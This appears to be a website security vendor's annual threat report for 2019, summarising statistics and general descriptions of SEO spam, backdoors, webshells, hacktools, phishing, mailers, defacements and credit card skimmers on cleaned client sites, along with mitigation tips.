Our investigations and analysis are a key component in the development of our cleanup rules and signatures. These pieces of code provide our tools with the information required to identify and mitigate a variety of known threats, including SEO spam, hidden backdoors, hacktools, and other malware.
In an ongoing effort to combat malware, our research team is constantly refining their signatures used for cleanup and detection. This year’s updates to our signature databases and automation scripts saw an improvement in detection rates and a reduction in false positives — which ultimately led to a more granular view of malware categories and signatures, and a shift in detection from 2018.
Top Detected Malware
To identify the most common threats facing our clients in 2019, our team aggregated and analyzed data from malware signatures that were detected and cleaned during our Incident Response process.
Why is there an overlap in percentages?
Our research and remediation teams regularly find more than one type of malware on a compromised website. For example, attackers often plant backdoors on a website after it has been compromised to maintain access to the environment.
SEO Spam
SEO spam is one of the fastest growing families over the past few years — and consistently one of the most common infections found on client sites.
During 2019, 62% of client sites contained SEO spam. Infections typically occur via PHP, database injections, or .htaccess redirects.
Websites impacted by SEO attacks often become infected with spam content and redirects that send site visitors to spam landing pages. These attacks can significantly impact rankings and organic traffic from popular search engines like Google, Bing, and Yahoo, who block websites for serving malicious content.
Left untreated, SEO spam can seriously damage a website’s reputation and site visitors, and lead to a loss in revenue, hijacked search results, browser warnings, and ultimately blocklisting.
The majority of infected websites contained more than one type of spam injection. Our data saw an average of 12 different types of injected spam on a single website, indicating that attackers use a variety of methods to monetize compromised websites and rank for specific keywords.
On average, websites infected with SEO spam were found to have 12 different types of injected spam.
The most popular SEO spam malware was found in the database, and was responsible for infecting website posts and pages with unwanted content. In fact, in 2019 39% of all sites we cleaned for SEO spam infections had their database compromised.
One technique that hackers commonly employed was cloaking, causing search engines and site visitors to see different content on compromised site pages. With this technique, the content of entire websites are replaced with spam and indexed by search engine crawlers. However, when a real visitor comes organically from a search engine, they’ll be redirected to a landing page on a third-party website. Webmasters typically see the website as they created it, without any changes or spam content whatsoever.
In 2019, 39% of all sites cleaned for SEO spam infections had their database compromised.
Another common technique included injecting blocks of links made invisible by CSS tricks or JavaScript, which are used to help search engines find spam sites and index them. These links are often placed on legitimate pages with the intention of increasing the number of backlinks and boost rankings for spammy websites.
Common Spam Content
We analyzed SEO spam keywords from SiteCheck to identify the most prevalent themes and keywords on hacked websites.
Top Spam Themes
- Viagra
- Cialis
- Sport jerseys
- Pharmacies/no prescriptions
- Replica watches
- Porn
- Turkish escort spam
- Essay spam
Unsurprisingly, 59% of spam content was related to pharmaceutical industries, with viagra (31%) and cialis (17%) being the most common keywords in this category.
59% of spam was related to pharmaceuticals and male enhancement keywords in 2019.
Replica merchandise spam was another common theme, with 34% of spam detections related to this category. In fact, 27% of all detections promoted fake sport team jerseys for popular leagues like the NFL and NHL.
These themes have stayed more or less the same for the past 10 years, with relatively few changes.
Backdoors
Backdoors are one of the most common threats found on compromised websites. In 2019, 47% of infected sites containing at least one backdoor.
When injected into a website, this malware aims to bypass regular access channels to give attackers privileged permissions into the system. Once installed, bad actors use these backdoors to maintain access long after the initial infection has taken place.
At the file level, backdoors are prone to removal during core, theme, and plugin updates. It’s typically easier to find and remove common backdoors than it is for other malware categories like database spam, which might be found injected within legitimate wp_post_entries.
Uploaders
The most common type of backdoor found in 2019 fell under the uploaders category. As the name implies, this malicious code allows anyone with the correct path, parameters, and (sometimes) credentials to upload malicious files to the website filesystem. These can be leveraged to drop spam, webshells, or hacktools to the site.
Remote Code Execution Backdoors
One of the more simple varieties includes remote code execution backdoors, which aren’t to be confused with other remote code execution vulnerability exploits.
This malware takes code provided by the attacker by using a variety of methods, the most notable being POST, GET, or COOKIE requests. The simplicity and effectiveness makes it extremely common on reinfections — and the top three on our logs.
As an uploader, it can only be reached by people with the correct path and parameters, including credentials, allowing bad actors to upload files without the consent of the webmaster.
Webshells
Webshells are dashboards that provide an interface for the attacker to the website filesystem. These webshells allow bad actors to perform common functions, including renaming, copying, editing files, changing file permissions, and archiving files.
Some webshells also contain other attack capabilities — like running PHP code, accessing database servers, and triggering other attacks to the server to escalate privileges.
Backdoor Mitigation Tips:
- Employ file integrity monitoring tools to identify indicators of compromise.
- Create and maintain strong, unique passwords on all accounts.
- Use a firewall to filter malicious activity and block access to backdoors.
- Keep all software patched with the latest security updates to mitigate risk.
In many instances, attackers scan sites for known backdoors in target hosts, looking to potentially abuse another attacker’s backdoor. Backdoors give are particularly effective at eluding modern website scanning technologies — making them one of the most commonly missed payloads, and a leading cause of reinfections.
Hacktools
The hacktool category is used by our researchers to identify tools planted by bad actors on web servers for their own use. These tools normally don’t affect the site itself — instead, they take advantage of server resources for malicious activity.
In 2019, nearly 3% of websites were found to contain a hacktool.
Some examples of hacktools may include tools used for mass defacement of a website, spam mailers, botnet scripts, scripts used to fingerprint vulnerable sites on a shared server environment, or tools used for DDoS attacks.
There were a total of 135 new hacktools added to our signature database this year alone, indicating that attackers are constantly innovating and creating new tools to help them hack websites.
Commonly found hacktools include configuration stealers, which read configuration files to steal credentials, addresses of database servers in shared hosting environments, and data from other CMS configuration files.
Phishing
Phishing campaigns in 2019 typically masqueraded as popular services including webmail, login pages for reputable brands, online banking portals, or landing pages for popular social networks.
Attackers employed targeted email campaigns with messaging containing fear, uncertainty, doubt, or personalized elements to encourage users to navigate to deceptive phishing landing pages.
These landing pages are usually composed of several HTML pages that mimic a login workflow to collect sensitive user information. They also include a PHP script that either emails data to attackers, or stores it somewhere on the site so that it can be obtained at a later date.
The biggest phishing campaigns that our client base saw in 2019 were related to Netflix, followed by PayPal. Our researchers created hundreds of new signatures to detect phishing for popular brands like Microsoft, Apple, and Bank of America.
We also saw a large number of phishing-related signatures created for popular hosting providers and domain name registrars. When successful, these specific campaigns allow attackers to obtain login credentials to websites and server environments.
Mailers
Mailer scripts are used to send emails from compromised sites without a webmaster’s consent. These spam campaigns abuse web server resources, sending out large numbers of emails before a server is detected for sending spam and becomes blocklisted by email service providers and spam authorities.
This type of malware can be a problem for both webmasters and hosting providers, as it can cause mail sent from IPs to be placed into spam folders — or simply rejected entirely.
In 2019, nearly every phishing campaign saw a mailer script associated with it.
Defacements
Hackers are sometimes motivated by political or religious reasons — or simply vandalize a website for hooliganism. This vandalism triggers our tools defacement rules, responsible for over 5.76% of all client-side detections in 2019.
Our top 10 defacement signatures in 2019 were related to generic detections, meaning that our heuristic signatures detected a defacement without associating the attack to a specific hacker group.
Ecommerce Malware & Credit Card Stealers
In previous years, we saw massive attacks that used the same injections on large numbers of websites. One distinct difference in 2019 was a marked trend in the behaviour of credit card stealing attacks.
Our researchers found that credit card stealing malware is becoming more granular, and hackers aren’t aiming to infect large numbers of websites. Instead, they are creating targeted — and highly customized — infections for popular websites that have high traffic volume and a larger user base. Most notably in 2019 was the Magecart infection, which saw a large number of attacks against ecommerce websites for multiple CMS applications, including Magento and WordPress.
Infections which once targeted large numbers of websites in 2018 are now being highly customized on an individual basis.
The same script from the same malicious domain can be used on just a handful of websites – sometimes less. And this same campaign may use multiple malicious domains that are swapped out. Encrypted malware is also found to use the same encryption types on a smaller number of websites.
Our researchers also saw evasive techniques coded into skimmers that prevent certain behavior from being launched when certain conditions are met. For example, some skimmers won’t load if a visiting browser’s developer tools are open.
In 2019, our researchers added 178 new ecommerce malware signatures to SiteCheck, monitoring and detection, and cleanup scripts. Twenty-eight of these were associated with server-side skimmers that are not visible to external scans, highlighting the importance of monitoring for indicators of compromise on any content loaded within device browsers (e.g HTML, Javascript) or at the server level (e.g PHP).
In 2019, over 5,000 websites remotely scanning their environments with SiteCheck were found to contain credit card skimmers, impacting a large number of online shoppers. In addition to these websites, a total of 1,845 blocklisted skimmer resources were detected.
This year alone, our remediation team cleaned over 600 web servers infected with PHP credit card stealers, emphasizing the importance of server-side monitoring to detect indicators of compromise. Client-side credit card stealers were removed from database and Javascript files from over 1,700 websites.
Over 1,700 client-side and 600 server-side credit card stealers were removed from infected websites in 2019 by the Sucuri remediation team.